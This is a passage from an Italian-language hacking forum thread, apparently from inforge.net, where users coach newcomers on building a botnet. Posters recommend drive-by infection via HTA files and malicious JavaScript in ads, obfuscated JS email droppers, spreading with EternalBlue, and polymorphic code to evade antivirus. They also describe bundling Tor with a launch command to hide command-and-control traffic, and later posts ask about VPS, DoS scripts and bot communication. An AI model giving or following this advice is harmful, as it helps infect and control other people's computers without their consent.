Un altro esempio ancora con i file hta: li' a vittima potrebbe anche scaricarlo, ma il piu' delle volte, quando arriva l' avviso "run the hta file?", si clicca di default su "run", cosi' senza scaricare la vittima esegue un codice infetto sul browser che prend il contollo della macchina.
Un altro esempio ancora: con una semplice funzione js, potresti inserire in un' immagine o in un ads del sito un js malevolo: appena la vittima lo vede [senza aver fatto nulla], gli infetta il browser e poi da li' il sistema [che so', magari scarica in automatico una estensione infetta].

Per quanto riguarda questo:
. O a limite, magari se non è possibile fare quello che ho chiesto, si può autoscaricare un file e autorunnarlo dal browser se si va su un sito infetto?

Allora, cio' che dici si puo' fare ; Comunque anche questo sarebbe possibile, ma non in js [almeno che non trovi una falla nel browser], dovresti adottare un applet infetto che downloada e runna in automatico un file che poi scarica il payload vero e proprio;
con il codice in powershell di prima se ricordi ...........altrimenti, ma devi essere un po' piu' bravino, devi implementare nella pagina html uno script in powershell [che di fatto diviene un hta file] che ha quella funzione di quello che ti avevo mandato prima.

Comunque si' : si puo' infettare semplicmente visulizzando la pagina
 
  • Mi piace
Reazioni: Anianded
Perfetto ora ho capito, ti continuo a ringraziare per l'enorme curiosità che mi stai togliendo. Ritornando a tor, ora mi è più chiaro, devono essere i bot che devono connettersi tramite tor al server. Il problema è: come fare? Molto spesso tor non è installato nei sistemi, e in quel caso che si fa?
tranquillo sia io che l'altro utente (Gorate) siamo felici di darti una mano comunque piccolo consiglio tecnico non utilizzare exploit kit web based poichè alla fine lo stesso exploit va a essere patchato e non hai più vettori di spreading utilizza eternalblue (del quale ho fatto una guida che ti linko qui https://www.inforge.net/xi/threads/...ainer-di-eternalblue-doublepulsar-ecc.477772/) e soprattutto le mail infette con allegato in js (che sia un dropper o che sia il virus vero e proprio) poichè alcuni antivirus anche molto noti come Malwarebytes non analizzano e rilevano malevoli questi tipi di file ma comunque, nel caso in cui il js sia solo il downloader del trojan fai attenzione 1 ad offuscarlo 2 a creare a mano tua il trojan se possibile che poi infetta le vittime rendendole computer zombie
 
  • Mi piace
Reazioni: Anianded
Grazie! ma dopo che creo il trojan, e vedo che non è rilevato dall'antivirus, conviene che lo passo sopra un crypter o lo lascio così? E poi, come faccio a sapere se il codice di un exe è offuscato o meno?
no aspetta io ti dico di offuscare il javascript che scarica e esegue il trojan da internet oppure che lo "droppa", il codice dell'exe si offusca quando il file non è ancora compilato (e quindi l'obfuscation cambia in base al linguaggio che si usa) poichè a differenza di un javascript che basta aprire con il blocco note per trovare il codice sorgente l'exe è compilato e quindi è (relativamente) più difficile risalire al source code stesso. Riguardo al fattore crypter io ti consiglio di effettuare un malware con codice polimorfico cioè che, appena eseguito decripta la parte malevola e la esegue così da superare lo scantime.
 
  • Mi piace
Reazioni: Anianded
Grazie, mi dici come si potrebbe risalire al sorgente di un file exe compilato?

Si ma in questo caso lo zombie deve necessariamente avere tor installato e attivo... E la maggior parte delle persone non usa tor
la prima cosa si chiama reverse engineering ed è abbastanza complicatuccia, per la seconda cosa basta che fai in modo che il javascript scarichi anche una cartella che crei tu dove inserisci tutti i file necessari al funzionamento di tor e nella stessa sottocartella di tor.exe inserisci il file torrc-defaults (che prima si trovava in \Tor Browser\Browser\TorBrowser\Data\Tor) poi fai si che il javascript esegua il comando tor.exe -f .\torrc.defaults nella cartella con tutti i file così da far partire il servizio tor infine tramite il file python fai tutto come se avessi tor facendo passare tutti i dati per la porta 9150 non 9050 tuttavia prendi questa parte molto con le pinze essendo questa solo frutto di una mia teoria
 
  • Mi piace
Reazioni: Anianded
Allora, per risalire al source, semplicemente bisogna reversare il vettore di infezione [appunto e' comodo un exploit kit: non lascia evidenti traccie "materiali" su pc attaccato];
Comunque nel reversing, la prima cosa e' diasemblare il file, vedi IDA Pro; Se evntualmente criptato, cerchi tracce in moduli od altri file creati dal malware in modo da trovare come e' stato criptato/offuscato il codice. Poi reversi in codice assembly il file [vedi Olydbg], infine attraverso altri tool cerchi di trovare piu' info, come processi creati, thread innescati, altri moduli che servono per il run dell' applicazione od eventuali dipendenze; Alla fine analizzi il codice assembly risultante, e provi attraverso vari comandi e tool a trovare dove vengono mandate/ricevute le connessioni e di conseguenza trovi il sito/server da cui provengono; Un comando molto semplice per vedere le connessione in entrata ed uscita e' :
Codice:
netstat -a
.
Per quanto riguarda la cosa di TOR, io pensavo piu' ad un vettore che faccia passare i comandi sotto proxy, e le relative risposte di out dei dispositivi infettati: in questo modo emuli Tor al meglio; Mentre se vuoi proprio Tor, devi trovare il modo : https://www.researchgate.net/publication/289853847_Tor-based_Malware_and_Tor_Connection_Detection e comunque provare con sfruttare il servizio Tor attraverso applicativi "prefabbricati" che di conseguenza ti permettno di far connettere la vittima a Tor dopo aver eseguito lo script, un po' come ha detto ScriptMan, ma cercando di fare il tutto con script powershell o python ............
;Sempre se escludi la cosa dei pannelli secondari in clear web e il principale in anonimato............
 
  • Mi piace
Reazioni: Anianded

Bart_

Utente Silver
8 Ottobre 2013
33
6
6
52
Ultima modifica:
Salve,
Volevo iniziare a creare una botnet perché sono molto affascinato da questo mondo.
Le mie domande sono:
- Da che siti posso reperire delle VPS da poter utilizzare nella botnet?
- Che tool/programma/script posso utilizzare? Ho visto e letto la guida sul forum su come creare una botnet, ma non mi è ancora tutto molto chiaro.
- System Requirements di una VPS per poter essere utilizzata nella botnet?

Grazie a tutti per l'aiuto, spero di apprendere meglio il funzionamento e altre informazioni riguarda ad una botnet [emoji4]

Inviato dal mio SM-G930F utilizzando Tapatalk
 
@Gorate wow grazie mille, la mia idea era quella di comprare tante vps piccole/modeste da tipo 1GB di ram e farle diventare parte della botnet. Secondo te può funzionare? Alla fine penso che l'importante sia la banda di una VPS (forse sbaglio). Per quale motivo servono macchine con tanta ram? Non ne vedo il motivo

Inviato dal mio SM-G930F utilizzando Tapatalk
 
Domanda: nella guida che ho linkato prima il client bot funziona solo su Windows (bot.exe). Come potrei fare se lo volessi far funzionare anche su linux? Grazie

Inviato dal mio SM-G930F utilizzando Tapatalk
 
Ho seguito interessato il post e le brillanti risposte di @Gorate che ringrazio (anche se non sono l'autore del post) di condividere il tuo sapere. Comunque, se puoi, mi daresti delle delucidazioni?


Se stai pensando di uppare un dosser in ogni macchina, la cosa sarebbe dispendiosa, inoltre non servirebbe avviarne 1000 su una macchina perche' tanto il traffico e' quello.
In questo caso cosa si fa se tu sconsigli di uppare lo script per gli attacchi dos ad ogni zombie?


Per il resto, ancora non mi è ancora chiara la parte tecnica della creazione e dialogo tra piattaforma di controllo e zombies. Allora, io mando in un modo o nell'altro un file che eseguito nella macchine vittime le infetta. Questa "infezione" di cui parliamo, cosa comprende? Semplicemente il file si annida nel pc e viene eseguito ad ogni avvio e serve da ascolto per i comandi che l'attaccante vuole impartire? Poi, come funziona la comunicazione tra attaccante e i membri della rete zombies? Mettiamo caso che l'attaccante vuole far partire un attacco ddos con tutti gli zombies della botnet. La comunicazione tramite che protocollo avviene? HTTP ne dubito, visto che è un protocollo limitato al word wide web. Quindi se non è HTTP, come impartiamo i comandi? Tramite che porta? In che modo?

Ultima cosa, per chi è alle prime armi e vuole esercitarsi semplicemente, si potrebbe anche evitare di fare un pannello php dove controllare i bot a distanza e fare il tutto semplicemente da riga di comando?
Grazie in anticipo!
 
Stato
Discussione chiusa ad ulteriori risposte.